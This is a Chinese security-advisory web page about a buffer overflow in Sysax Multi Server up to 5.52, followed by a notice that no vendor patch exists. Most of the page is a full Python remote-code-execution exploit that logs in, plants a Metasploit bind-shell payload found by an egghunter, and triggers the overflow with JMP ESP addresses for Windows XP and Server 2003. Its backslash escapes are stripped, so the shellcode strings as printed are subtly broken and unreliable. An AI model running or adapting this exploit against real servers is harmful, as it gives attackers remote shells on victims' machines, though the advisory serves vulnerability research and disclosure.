首页 / 操作系统 / Linux / Sysax Multi Server “uploadfile_name1.htm”缓冲区溢出漏洞
发布日期:2012-02-09 更新日期:2012-02-10受影响系统: Codeorigin Sysax Multi Server 5.52 Codeorigin Sysax Multi Server 5.50 Codeorigin Sysax Multi Server 5.25 Codeorigin Sysax Multi Server 4.3 描述: -------------------------------------------------------------------------------- BUGTRAQ ID: 51950Sysax Multi Server是Windows平台下的SSH2和FTP服务器。Sysax Multi Server在实现上存在缓冲区溢出漏洞,攻击者可利用此漏洞执行任意代码。<*来源:Craig Freyman
链接:http://www.pwnag3.com/2012/02/sysax-multi-server-552-file-rename.html *>测试方法: -------------------------------------------------------------------------------- 警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Craig Freyman ()提供了如下测试方法:#!/usr/bin/python ########################################################################################################## #Title: Sysax Multi Server <= 5.52 File Rename BoF RCE (Egghunter) #Author: Craig Freyman (@cd1zz) #Tested on: XP SP3 32bit and Server 2003 SP2 32bit(No DEP) #Software Versions Tested: 5.50 and 5.52 #Date Discovered: Febrary 1, 2012 #Vendor Contacted: Febrary 3, 2012 #Vendor Response: (none) #A complete description of this exploit can be found here: #http://www.pwnag3.com/2012/02/sysax-multi-server-552-file-rename.html ########################################################################################################## import socket,sys,time,re,base64 if len(sys.argv) != 6: print "[+] Usage: ./filename <Target IP> <Port> <User> <Password> <XP or 2K3>" sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) user = sys.argv[3] password = sys.argv[4] opersys = sys.argv[5] #base64 encode the provided creds creds = base64.encodestring(user+"x0a"+password) #msfpayload windows/shell_bind_tcp LPORT=4444 R|msfencode -e x86/alpha_mixed -b "x00x2fx0a" shell = ("DNWPDNWP" "x89xe3xdaxc5xd9x73xf4x5ax4ax4ax4ax4ax4ax4a" "x4ax4ax4ax4ax4ax43x43x43x43x43x43x37x52x59" "x6ax41x58x50x30x41x30x41x6bx41x41x51x32x41" "x42x32x42x42x30x42x42x41x42x58x50x38x41x42" "x75x4ax49x39x6cx58x68x6dx59x55x50x65x50x45" "x50x55x30x4ex69x39x75x55x61x39x42x61x74x4c" "x4bx51x42x50x30x6ex6bx73x62x36x6cx6ex6bx63" "x62x57x64x6cx4bx53x42x55x78x66x6fx6dx67x73" "x7ax37x56x45x61x4bx4fx45x61x6fx30x4cx6cx65" "x6cx61x71x33x4cx75x52x64x6cx45x70x79x51x38" "x4fx66x6dx63x31x58x47x7ax42x68x70x73x62x71" "x47x6cx4bx33x62x32x30x4cx4bx77x32x55x6cx36" "x61x58x50x6ex6bx71x50x62x58x6ex65x4bx70x33" "x44x61x5ax77x71x68x50x72x70x4cx4bx33x78x36" "x78x6ex6bx70x58x71x30x57x71x59x43x79x73x75" "x6cx43x79x6ex6bx34x74x6cx4bx47x71x6ex36x55" "x61x49x6fx56x51x6fx30x4cx6cx49x51x68x4fx34" "x4dx33x31x49x57x64x78x69x70x30x75x38x74x75" "x53x53x4dx6bx48x37x4bx71x6dx51x34x52x55x6a" "x42x33x68x4ex6bx42x78x75x74x43x31x6ex33x62" "x46x6ex6bx66x6cx32x6bx4ex6bx76x38x47x6cx77" "x71x68x53x4ex6bx65x54x4cx4bx57x71x78x50x4f" "x79x67x34x51x34x51x34x63x6bx61x4bx65x31x30" "x59x30x5ax53x61x39x6fx6dx30x33x68x31x4fx52" "x7ax6cx4bx65x42x68x6bx4cx46x63x6dx55x38x44" "x73x46x52x63x30x33x30x35x38x42x57x30x73x50" "x32x73x6fx50x54x31x78x52x6cx34x37x44x66x44" "x47x59x6fx6ex35x6ex58x6ex70x77x71x55x50x55" "x50x46x49x49x54x46x34x42x70x61x78x51x39x6f" "x70x50x6bx53x30x59x6fx49x45x50x50x50x50x36" "x30x72x70x51x50x32x70x57x30x72x70x43x58x38" "x6ax34x4fx79x4fx6bx50x79x6fx39x45x6dx59x79" "x57x50x31x49x4bx51x43x65x38x43x32x45x50x72" "x31x73x6cx6cx49x49x76x32x4ax34x50x76x36x72" "x77x45x38x5ax62x4bx6bx55x67x63x57x79x6fx38" "x55x71x43x51x47x43x58x4fx47x59x79x64x78x69" "x6fx59x6fx7ax75x36x33x70x53x51x47x65x38x61" "x64x78x6cx67x4bx69x71x49x6fx48x55x70x57x6f" "x79x49x57x63x58x42x55x50x6ex72x6dx55x31x79" "x6fx39x45x33x58x63x53x72x4dx35x34x77x70x4e" "x69x79x73x76x37x73x67x62x77x46x51x7ax56x31" "x7ax57x62x76x39x46x36x4bx52x39x6dx42x46x38" "x47x62x64x61x34x47x4cx45x51x57x71x4cx4dx47" "x34x76x44x44x50x79x56x63x30x53x74x33x64x70" "x50x53x66x42x76x52x76x53x76x76x36x30x4ex71" "x46x32x76x36x33x62x76x53x58x44x39x48x4cx57" "x4fx6ex66x69x6fx79x45x6fx79x6dx30x30x4ex32" "x76x63x76x49x6fx56x50x42x48x65x58x6dx57x45" "x4dx31x70x79x6fx38x55x4dx6bx78x70x4dx65x69" "x32x30x56x50x68x4fx56x4ax35x4dx6dx6fx6dx49" "x6fx39x45x55x6cx66x66x43x4cx56x6ax4dx50x69" "x6bx59x70x64x35x74x45x6fx4bx53x77x55x43x43" "x42x42x4fx43x5ax55x50x52x73x79x6fx68x55x41" "x41") egghunter = ("x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x44x4ex57x50x8bxfaxafx75xeaxafx75xe7xffxe7") print "============================================================================" print " Sysax Multi Server <= 5.52 File Rename BoF " print " by cd1zz " print " www.pwnag3.com " print " Launching exploit against " + target + " on port " + str(port) + " for " + opersys print "============================================================================" #login with encoded creds login = "POST /scgi?sid=0&pid=dologin HTTP/1.1
" login += "Host:
" login += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
" login += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
" login += "Accept-Language: en-us,en;q=0.5
" login += "Accept-Encoding: gzip, deflate
" login += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
" login += "Proxy-Connection: keep-alive
" login += "http://"+target+"/scgi?sid=0&pid=dologin
" login += "Content-Type: application/x-www-form-urlencoded
" login += "Content-Length: 15
" login += "fd="+creds #grab the sid r = socket.socket(socket.AF_INET,socket.SOCK_STREAM) r.connect((target, port)) print "[*] Getting your SID." r.send(login + "
") page = r.recv(10240) sid = re.search(r"sid=[a-zA-Z0-9]{40}",page,re.M) if sid is None: print "[X] Could not get a SID. User and pass correct?" sys.exit(1) print "[+] Your " + sid.group(0) time.sleep(2) #find the users path to calc offset print "[*] Finding home path to calculate offset." path = re.search(r"file=[a-zA-Z0-9]:\[\.a-zA-Z_0-9 ]{1,255}[\$]",page,re.M) time.sleep(1) #if that doesnt work, try to upload a file and check again if path is None: print "[-] There are no files in your path so I"m going to try to upload one for you." print "[-] If you don"t have rights to do this, it will fail." upload = "POST /scgi?"+str(sid.group(0))+"&pid=uploadfile_name1.htm HTTP/1.1
" upload += "Host:
" upload += "Content-Type: multipart/form-data; boundary=---------------------------97336096252362005297691620
" upload += "Content-Length: 219
" upload += "-----------------------------97336096252362005297691620
" upload += "Content-Disposition: form-data; name="upload_file"; filename="file.txt"
" upload += "Content-Type: text/plain
" upload += "-----------------------------97336096252362005297691620--
" u = socket.socket(socket.AF_INET,socket.SOCK_STREAM) u.connect((target, port)) u.send(upload + "
") page = u.recv(10240) path = re.search(r"file=[a-zA-Z0-9]:\[\.a-zA-Z_0-9 ]{1,255}[\$]",page,re.M) time.sleep(2) if path is None: print "[X] It failed, you probably don"t have rights to upload." print "[X] You will need to get your path another way to properly calculate the offset." sys.exit(1) print "[+] Got it ==> " + path.group(0) time.sleep(1) #subtract --> file=c: <--- (8 bytes) from the length and minus one more for the trailing --> pathlength = len(path.group(0)) - 8 - 1 #print "[*] The path is " + str(pathlength) + " bytes long (not including C:)." if pathlength < 16: print "[X] Your path is too short, this will just DoS the server." print "[X] The path has to be at least 16 bytes long or we cant jump to our buffer." sys.exit(1) time.sleep(2) r.close() #jump back 128 bytes jumpback = "xebx80" #No DEP bypass if opersys == "2K3": #2043 is the offset for c:A offset = 2044 - pathlength padding = "x90" * 10 junk = "x41" * (offset - len(egghunter+padding)) jump = "xa4xdex8ex7c" #JMP ESP buf = junk + egghunter + padding + jump + "x90"*12 + jumpback + "D"*10 if opersys == "XP": #2044 is the offset for c:A offset = 2044 - pathlength padding = "x90" * 10 junk = "x41" * (offset - len(egghunter+padding)) jump = "x53x93x42x7e" #JMP ESP buf = junk + egghunter + padding + jump + "x90"*12 + jumpback + "D"*10 #print "[*] Your offset is " + str(offset) #we"ll stuff our shell in memory first stage1 = "POST /scgi?"+str(sid.group(0))+"&pid="+shell+"mk_folder2_name1.htm HTTP/1.1
" stage1 += "Host:
" stage1 += "Referer: http://"+target+"/scgi?sid="+str(sid.group(0))+"&pid=mk_folder1_name1.htm
" stage1 += "Content-Type: multipart/form-data; boundary=---------------------------1190753071675116720811342231
" stage1 += "Content-Length: 171
" stage1 += "-----------------------------1190753071675116720811342231
" stage1 += "Content-Disposition: form-data; name="e2"
" stage1 += "file_test
" stage1 += "-----------------------------1190753071675116720811342231--
" #this is the bof stage2 = "POST /scgi?"+str(sid.group(0))+"&pid=rnmslctd1_name1.htm HTTP/1.1
" stage2 += "Host:
" stage2 += "Referrer: http://"+target+"/scgi?sid=0&pid=dologin
" stage2 += "Content-Type: multipart/form-data; boundary=---------------------------332173112583677792048824791
" stage2 += "Content-Length: 183
" stage2 += "-----------------------------332173112583677792048824791
" stage2 += "Content-Disposition: form-data; name="e2"
" stage2 += "file_"+buf+"
" stage2 += "-----------------------------332173112583677792048824791--
" s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((target, port)) print "[*] Sending stage 1 shell." s.send(stage1 + "
") time.sleep(3) ##Dont close the socket or we"ll lose our stage 1 shell in memory ##s.close() t = socket.socket(socket.AF_INET,socket.SOCK_STREAM) t.connect((target, port)) print "[*] Sending stage 2 BoF." t.send(stage2 + "
") print "[*] Go get your shell..." t.recv(2048)建议: -------------------------------------------------------------------------------- 厂商补丁:Codeorigin ---------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.ftpshell.com/index.htmLinux Kernel “journal_unmap_buffer()”本地拒绝服务漏洞Android 平台发现新型手机病毒 Rootsmart相关资讯 Sysax Multi Server
Sysax Multi Server函数缓冲区溢出 (08/01/2012 06:59:25)
Sysax Multi Server SFTP模块缓冲 (03/01/2012 06:57:22)
Sysax Multi Server "username"字 (03/01/2012 07:01:16)
易网时代-编程资源站